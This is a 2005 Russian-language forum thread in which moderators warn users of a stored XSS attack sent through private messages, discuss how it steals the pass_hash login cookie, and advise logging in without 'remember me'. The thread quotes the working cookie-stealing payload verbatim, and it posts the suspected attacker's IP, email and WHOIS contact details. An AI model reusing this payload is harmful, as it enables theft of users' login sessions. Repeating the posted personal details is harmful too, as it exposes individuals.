Если вам опера выдает в постах или в любой точке форума что-то типа:
` style=`background:url(javaSCript:document.images[1].src="http://runiverse.net/forum/images/avatars/xxx/snif.php?"+document.cookie)`
Или по ПМ, или в любом виде - немедленно сообщите об этом Айвану, ДБКолу или любому супермодератору, чтобы автор этих сообшений был забанен.
Этот скрипт опасен. Он похищает ваши пароли.
Был замечен wasd.
QUOTE (Leon PRO @ Oct 25 2005, 18:35) |
Если вам опера |
Так-с-с...
1.Ошибка оперы или форума?
2. Это может быть в любом посту и стпром в том числе?
мне пришло на пм. Я добанил его до 100 (Леон уже 20 поставил до этого) и на всяк сменил пасс.
В других браузерах скрипт просто ворует у вас пароли и все...
А Опера блокирует. И видно кусочек оного.
Говорит о крутости Оперы и о дыре в форуме. Что за ник то был у атакующего?
У нормальный людей JS is disabled
QUOTE (RiPPeR @ Oct 25 2005, 19:53) |
У нормальный людей |
QUOTE (Clement Astilon @ Oct 25 2005, 19:42) |
В других браузерах скрипт просто ворует у вас пароли и все |
Не знаю,не знаю..в ИЕ тоже виден кусок.
А если FireFox? Что ж мне теперь - все пароли менять?.. Кто выпустил скрипт на волю? Ворует он пароли вообще их сохраненных - или только для форума?
Скрипт ворует кукисы, один из кукисов называется pass_hash
В этом куке хранится MD5 от пароля (хэш пароля). Вроде ничего, но только существуют средства, как подобрать пароль, чтобы MD5 совпал. То есть, пароль не обязательно должен совпадать с вашим, достаточно, что результат функции md5() будет одинаковым и для вашего пароля, и для свежеподобранного.
Защита от этого зловредного скриптика проста, как валенок: надо выйти из форума (отлогиниться), затем опять загогиниться, но на форме логина НЕ СТАВИТЬ ГАЛКУ "запомнить меня". И все. Галка не стоит - захэшированный пароль в кукисах не валяется - и воруйте, хоть обворуйтесь. Недостаток тут только один: при каждом посещении форума надо авторизироваться, но с моей личной точки зрения (ИМХО) это скорее достоинство...
Добавлено в 01:55
Добавлю...
Кстати, ворует оно только кукисы того хоста (домена), где было запущено. То есть кукисы для, скажем, mail.ru на wrg.ru получить будет невозможно. Аналогично и обратное. Это особенности кукисной системы и честь и хвала Netscape, что в своё время с умом сделали эту технологию.
Добавлено в 02:09
QUOTE (maximal_up @ Oct 25 2005, 19:45) |
Говорит о крутости Оперы и о дыре в форуме. |
Дырка для закрытия глюка с несанкционированным получением паролей пользователей форума уже давно разжована в инете... Советую поискать и исправить код.
CODE |
wasd 219.149.233.179 guru@komifree.ru |
CODE |
Отправлено: xss Lex Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss DBColl Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Salivin Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Leon PRO Oct 25 2005, 17:04 Прочитанные письма Отправлено: XSS Aiwan Oct 25 2005, 17:03 |
CODE |
Request: 219.149.233.179 connected to whois.arin.net [192.149.252.44:43] ... connected to whois.apnic.net [202.12.29.13:43] ... % [whois.apnic.net node-1] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html inetnum: 219.149.233.176 - 219.149.233.179 netname: JL-FUAO-COMPANY descr: JILIN-FUAO-COMPANY country: CN admin-c: CH123-AP tech-c: CNO3-AP status: ASSIGNED NON-PORTABLE mnt-by: MAINT-CHINATELECOM-JL changed: songlianjun@jltele.com 20040223 source: APNIC person: CHINATELECOM-JL Hostmaster nic-hdl: CH123-AP e-mail: songlianjun@jltele.com address: No.518,Changchun Street Changchun city,Jilin province,130042 phone: +86-431-5880020 fax-no: +86-431-5881234 country: CN changed: songlianjun@jltele.com 20041130 mnt-by: MAINT-CHINANET-JL source: APNIC person: CHINATELECOM-JL Network Operations nic-hdl: CNO3-AP e-mail: niuhui@jltele.com address: No.518,Changchun Street Changchun city,Jilin province,130042 phone: +86-431-5880036 fax-no: +86-431-5881234 country: CN changed: songlianjun@jltele.com 20041202 mnt-by: MAINT-CHINANET-JL source: APNIC |
CODE |
http://runiverse.net/forum/ |
QUOTE (Aiwan @ Oct 26 2005, 16:49) |
Отправлено: xss Lex Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss DBColl Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Salivin Oct 25 2005, 17:04 Прочитанные письма Отправлено: xss Leon PRO Oct 25 2005, 17:04 Прочитанные письма Отправлено: XSS Aiwan Oct 25 2005, 17:03 |
Айв, судя по всем это прокси. Кому бы из Китая наши пароли понадобились? Но прокси довольно легко пробиваются. Если хочешь могу народ поспрашивать как - получим настоящий ай-пи.
А разве через посты ай-пи не прбить? Я не думаю, что он его как-то изменял или скрывал. Тем-более, что интернет карт ай-пи меняется каждый раз... Валеско, идея хорошая, но не спасёт.
QUOTE |
Я не думаю, что он его как-то изменял или скрывал. Тем-более, что интернет карт ай-пи меняется каждый раз... Валеско, идея хорошая, но не спасёт. |
QUOTE (maximal_up @ Oct 26 2005, 18:19) |
А разве через посты ай-пи не прбить? |
QUOTE (maximal_up @ Oct 26 2005, 18:19) |
Тем-более, что интернет карт ай-пи меняется каждый |
Заплатки нет пока. так что не сохраняйте пасс свой. И если увидите такое письмо, сразу мне имя писаря в пм...
Постов у него нет. Так что ипи тока такой.
к слову...
http://droaam.nm.ru/images/hak-lam.jpg
QUOTE (Lex @ Oct 26 2005, 19:05) |
а если у него выделенка? или локалка со статичным ИП на выходе? |
QUOTE (Aiwan @ Oct 26 2005, 19:07) |
Постов у него нет. Так что ипи тока такой. |
maximal_up
http://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%BE%D0%BA%D1%81%D0%B8-%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
Русская версия Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)